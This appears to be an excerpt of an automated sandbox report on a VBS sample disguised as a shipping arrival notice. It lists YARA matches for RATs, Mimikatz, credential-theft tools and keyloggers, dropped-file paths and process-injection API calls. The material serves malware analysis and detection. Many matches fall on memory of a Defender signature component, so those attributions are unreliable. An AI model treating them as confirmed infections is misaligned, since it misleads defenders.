Source: 38.3.MpSigStub.exe.138bceeeac2.66.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from DrqgonFly APT report Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT Author: USG
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: Detects a ZxShell - CN threat group Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: XOR loops from Sakula malware Author: David Cannings
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project. Author: FireEye
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: Detects ROKRAT malware Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: Red Leaves C&C left in memory, use with Volatility / Rekall Author: David Cannings
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: gh0st Author: https://github.com/jackcr/
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: NetWiredRC Author: Jean-Philippe Teissier / @Jipe_
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT Author: USG
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: Detects a ZxShell - CN threat group Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: XOR loops from Sakula malware Author: David Cannings
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project. Author: FireEye
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: Detects ROKRAT malware Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: Red Leaves C&C left in memory, use with Volatility / Rekall Author: David Cannings
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: gh0st Author: https://github.com/jackcr/
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: NetWiredRC Author: Jean-Philippe Teissier / @Jipe_
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT Author: USG
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: Detects Pupy RAT Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: Detects Arid Viper malware sample Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: Detects Pupy backdoor Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: Detects ROKRAT malware Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: Red Leaves C&C left in memory, use with Volatility / Rekall Author: David Cannings
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: PoisonIvy_3 Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects a ZxShell - CN threat group Author: Florian Roth
Source: 00000026.00000003.18301521899.00000138BE774000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Pupy backdoor Author: Florian Roth
Source: 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Xtrem RAT v3.5 Author: Jean-Philippe Teissier / @Jipe_
Source: 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp, type: MEMORY	Matched rule: LogKext is an open source keylogger for Mac OS X, a product of FSB software. Author: @mimeframe
Source: 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects unspecified malware sample Author: Florian Roth
Source: 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects OilRig malware Author: Eyal Sela
Source: 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Xtrem RAT v3.5 Author: Jean-Philippe Teissier / @Jipe_
Source: 00000026.00000003.18345693514.00000138BE774000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 00000026.00000003.18306892097.00000138BD524000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 00000026.00000003.18352509630.00000138BD16D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Tofu Trojan Author: Cylance
Source: 00000026.00000003.18314349341.00000138BD01D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_DeputyDog_Fexel Author: ThreatConnect Intelligence Research Team
Source: 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT Author: USG
Source: 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Red Leaves C&C left in memory, use with Volatility / Rekall Author: David Cannings
Source: 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PoisonIvy_3 Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp, type: MEMORY	Matched rule: korlia Author: Nick Hoffman
Source: 00000001.00000003.14714384382.000002DEA1411000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000026.00000003.18320722145.00000138BD946000.00000004.00000001.sdmp, type: MEMORY	Matched rule: HackTool_MSIL_SharPersist_2 Author: FireEye
Source: 00000026.00000003.18324581744.00000138BDC1C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Xtrem RAT v3.5 Author: Jean-Philippe Teissier / @Jipe_
Source: 00000026.00000003.18312795035.00000138BEAE5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Pupy backdoor Author: Florian Roth
Source: 00000026.00000003.18316462962.00000138BD524000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: 9002 Identifying Strings Author: Seth Hardy
Source: 00000026.00000003.18357503095.00000138BE2D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects a ZxShell - CN threat group Author: Florian Roth
Source: 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp, type: MEMORY	Matched rule: gh0st Author: https://github.com/jackcr/
Source: 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 00000026.00000003.18309314406.00000138BD524000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 00000026.00000003.18357864029.00000138BE774000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 00000026.00000003.18290273099.00000138BE733000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Crypto Miner strings Author: Florian Roth
Source: 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects export from Gold Dragon - February 2018 Author: Florian Roth
Source: 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CVE_2018_4878_0day_ITW Author: unknown
Source: 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Mirage Identifying Strings Author: Seth Hardy
Source: 00000026.00000003.18325502433.00000138BEAA2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 00000026.00000003.18346478440.00000138BD16D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Tofu Trojan Author: Cylance
Source: 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Pupy backdoor Author: Florian Roth
Source: 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Webshells Auto-generated - file vanquish.exe Author: Yara Bulk Rule Generator by Florian Roth
Source: 00000026.00000003.18339341305.00000138BE774000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_DeputyDog_Fexel Author: ThreatConnect Intelligence Research Team
Source: 00000026.00000003.18290586958.00000138BE774000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 00000026.00000003.18350554191.00000138BE7D2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf-psh.vba Author: Florian Roth
Source: 00000026.00000003.18300875514.00000138BE2D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 00000026.00000003.18321311969.00000138BE145000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Keylogger component Author: Microsoft
Source: 00000026.00000003.18321311969.00000138BE145000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Hack Deep Panda - htran-exe Author: Florian Roth
Source: 00000026.00000003.18305388995.00000138BD315000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Fireball malware - file clearlog.dll Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: LogKext is an open source keylogger for Mac OS X, a product of FSB software. Author: @mimeframe
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: Metasploit Payloads - file msf-psh.vba Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: Detects Tofu Trojan Author: Cylance
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: Keylogger - generic rule for a Chinese variant Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: Detects a ZxShell - CN threat group Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: Unidentified Implant by APT29 Author: US CERT
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: Detects Pupy backdoor Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: HackTool_MSIL_SharPersist_2 Author: FireEye
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: Webshells Auto-generated - file vanquish.exe Author: Yara Bulk Rule Generator by Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: probable petya ransomware using eternalblue, wmic, psexec Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: 9002 Identifying Strings Author: Seth Hardy
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: APT_DeputyDog_Fexel Author: ThreatConnect Intelligence Research Team
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: Mirage Identifying Strings Author: Seth Hardy
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: gh0st Author: https://github.com/jackcr/
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: gholeeV1 Author: unknown
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html Author: unknown
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: NetWiredRC Author: Jean-Philippe Teissier / @Jipe_
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: PoisonIvy_3 Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: CVE_2018_4878_0day_ITW Author: unknown

Source: Arrival_Notice-AutonotificationimportsEUR-sealandmaersk.com_october2021.vbs

Initial sample: Strings found which are bigger than 50

Source: AZTEKERNES.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpCmdRun.exe.44.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpCopyAccelerator.exe.44.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpDlpCmd.exe.44.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpCmdRun.exe0.44.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpCopyAccelerator.exe0.44.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpAsDesc.dll.44.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpOAV.dll.44.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpUxAgent.dll.44.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpAsDesc.dll0.44.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpOAV.dll0.44.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Windows\System32\wscript.exe	Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Section loaded: edgegdi.dll
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Section loaded: edgegdi.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Section loaded: edgegdi.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Section loaded: edgegdi.dll

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe

File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Drivers\WdBoot.sys

Jump to behavior

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe

File deleted: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\1.1.18500.10_to_1.1.18600.4_mpengine.dll._p

Jump to behavior

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: String function: 00007FF7B57D0DB4 appears 56 times
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: String function: 00007FF7B582BAAC appears 36 times
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: String function: 00007FF7B57D0D88 appears 41 times

Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022FA6D2 NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022FAB15 LoadLibraryA,NtResumeThread,
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F5D74 NtWriteVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F91AF LoadLibraryA,NtAllocateVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022FA67E NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F5E52 NtWriteVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F92BD NtAllocateVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022FAEC6 NtResumeThread,
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022FAB42 NtResumeThread,
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F5F89 NtWriteVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022FAB9E NtResumeThread,
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022FAC0B NtResumeThread,
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022FAC72 NtResumeThread,
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022FAC41 NtResumeThread,
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F6057 NtWriteVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022FAC92 NtResumeThread,
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022FACC6 NtResumeThread,
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022FAD8E NtResumeThread,
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F91F6 NtAllocateVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F5DC7 NtWriteVirtualMemory,
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_00A0B35D Sleep,NtProtectVirtualMemory,
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_00A0B41D NtProtectVirtualMemory,
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_00A0B467 NtProtectVirtualMemory,
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_00A0B3B1 NtProtectVirtualMemory,
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_00A0B418 NtProtectVirtualMemory,
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57DC444 NtQueryInformationProcess,NtQueryInformationProcess,FindCloseChangeNotification,CloseHandle,
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57E5DB4 NtQueryInformationFile,NtQueryInformationFile,RtlNtStatusToDosError,
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57D9FF0 NtSetInformationFile,
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57E5B80 ReadFile,FlushFileBuffers,SetEndOfFile,NtSetInformationFile,

Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce283a.74.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcd0731e.140.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce283a.167.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce32d4.72.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce2d87.168.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce32d4.166.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce2d87.73.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_004013E8
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_0040954B
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F0E0F
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F2293
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022FAB15
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F5D74
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F91AF
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F3231
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F8200
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F9E1D
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F2293
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F4E71
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F6E49
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F2A45
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F5E52
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F2A50
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F9AA6
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F328A
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F1287
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F9E96
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F9EEC
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F82EB
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F9EDB
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F9F03
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022FA311
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F9F6E
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F3346
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022FAB42
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022FAB9E
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F9FFF
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022FAC0B
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F4C08
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F3415
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F9C6A
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F3462
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F247B
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022FAC72
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F9049
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F9043
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022FAC41
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022FA0AB
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F9C86
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022FAC92
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022FACC6
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F84DB
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F34DA
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F6134
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F9D1F
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022FA51B
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F4D6E
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F9D4E
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F4D43
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F81AA
